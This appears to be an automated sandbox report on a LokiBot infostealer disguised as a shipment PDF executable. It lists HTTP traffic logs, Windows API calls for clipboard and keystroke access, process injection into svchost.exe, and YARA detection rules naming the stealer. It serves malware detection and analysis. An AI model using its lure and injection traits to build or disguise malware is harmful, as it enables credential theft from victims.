Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:42:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P3N9%2BYFMYZ13oFW5Nep8i5Q3eY%2B5g2G1m76O6oCG%2Fsc9geOjfU6AzdZaeh1QFCgcJADcqaAnhFvzpMxh82O1P6P3Q9aKV9lDbfg5X%2FrMV980w9gLopKuPNC392A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd1430f34180d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:42:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=55%2FnylFOBEcPKaDM2j9U9leehq%2B9TN7dk3l1VBC%2BPjw7lq9xEh2GsVKBwMGJlCwXdbiX4sRom%2BveCtTidRFuZ6O0WB%2F%2BEhphLR%2B7XKBO0bpQBRdsWW6ykvvDbmM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd148388a72c2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:42:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dLLcD8o2PHqQWauzEB8zPvO4mrEJWt%2FihrPYn%2FnxrXaVBL5gXe0GTxikssUwsZSGkL4wyvQNXldc78cnIhB0ZH8dZkuViwqeYe1EAVpaLzcZW4HFSy4SlCsqxFE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd1533fa542fe-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1558&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:42:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHzeP3xY1LDVf2dmWQbHh4psTUGR%2F%2BxMyy5ZnzXB%2B%2FlGE4I%2Ft%2BjVo91zDoDkRoV9zDv9ok%2FiaxUEOO%2BDH3mLp6d0ZxWDwIsc10ybw92ErEw5z8wn1QsUigQvSUg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd15e1a46437f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2047&min_rtt=2047&rtt_var=1023&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=99&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:42:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlIomm44wvBQPJ1Ftk3DsCH1yFVzI%2BvQ8rV00MBFUfq713ej1fy7Z9WZ4n2L6oQJ9uqnCOBFu4gNaenm9kLeVOm%2FrSvOATd4USjjWL%2FaRkAtz5GqwXBPO5DBBBA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd1641b9f7286-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1926&rtt_var=963&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:42:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=la1skDAkIYQCg2SNIUR8z3XhcHq5JZ5Mo6Fe8HBZQOxMNMtoFdLmo7nYRMEduutGrShC7fq0Wv2%2B%2FdMwuh4YXqy1TCBf7OQpSX13tG0swmAiSUkCGinEAqx84Hk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd1690d0232fa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1906&min_rtt=1906&rtt_var=953&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 07:42:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4CRggahVmn17XdHIam3%2F4m2tfz5KRGXdU%2BqobfuVYF1pupdhMJfN%2BVyb1LM49TsuFutfKc%2F33imF11rLkGWX5eQMkfpWAHi14LDudtRyRbdyIAeoDW8FaX3fuE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 916dd16e5afdde96-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1620&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_00134164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00134164

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_00134164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00134164

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_00133F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00133F66

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_0012001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0012001C

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_0014CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0014CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7468, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7492, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: This is a third-party compiled AutoIt script.	0_2_000C3B3A
Source: Shipment Delivery No DE0093002-PDF.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000002.1707158226.0000000000174000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_51830f48-6
Source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000002.1707158226.0000000000174000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_6bbb9ae1-3
Source: Shipment Delivery No DE0093002-PDF.exe, 00000002.00000000.1706499272.0000000000174000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e3bb4e5f-1
Source: Shipment Delivery No DE0093002-PDF.exe, 00000002.00000000.1706499272.0000000000174000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_2a72a1d5-5
Source: Shipment Delivery No DE0093002-PDF.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c9487ced-e
Source: Shipment Delivery No DE0093002-PDF.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_6270c97e-1

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C3540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	3_2_006C3540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C2720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	3_2_006C2720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	3_2_006C33C0

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_0012A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0012A1EF

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_00118310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00118310

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_001251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_001251BD

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000CE6A0	0_2_000CE6A0
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000ED975	0_2_000ED975
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000E21C5	0_2_000E21C5
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000F62D2	0_2_000F62D2
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_001403DA	0_2_001403DA
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000F242E	0_2_000F242E
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000E25FA	0_2_000E25FA
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0011E616	0_2_0011E616
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000D66E1	0_2_000D66E1
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000F878F	0_2_000F878F
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000D8808	0_2_000D8808
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00140857	0_2_00140857
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000F6844	0_2_000F6844
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00128889	0_2_00128889
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000ECB21	0_2_000ECB21
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000F6DB6	0_2_000F6DB6
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000D6F9E	0_2_000D6F9E
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000D3030	0_2_000D3030
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000E3187	0_2_000E3187
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000EF1D9	0_2_000EF1D9
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000C1287	0_2_000C1287
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000E1484	0_2_000E1484
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000D5520	0_2_000D5520
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000E7696	0_2_000E7696
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000D5760	0_2_000D5760
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000E1978	0_2_000E1978
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000F9AB5	0_2_000F9AB5
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000CFCE0	0_2_000CFCE0
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000E1D90	0_2_000E1D90
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000EBDA6	0_2_000EBDA6
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00147DDB	0_2_00147DDB
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000CDF00	0_2_000CDF00
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_000D3FE0	0_2_000D3FE0
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00D174F0	0_2_00D174F0
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 2_2_01436538	2_2_01436538
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040549C	3_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004029D4	3_2_004029D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C2720	3_2_006C2720

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: String function: 000E8900 appears 42 times
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: String function: 000C7DE1 appears 35 times
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: String function: 000E0AE3 appears 70 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times

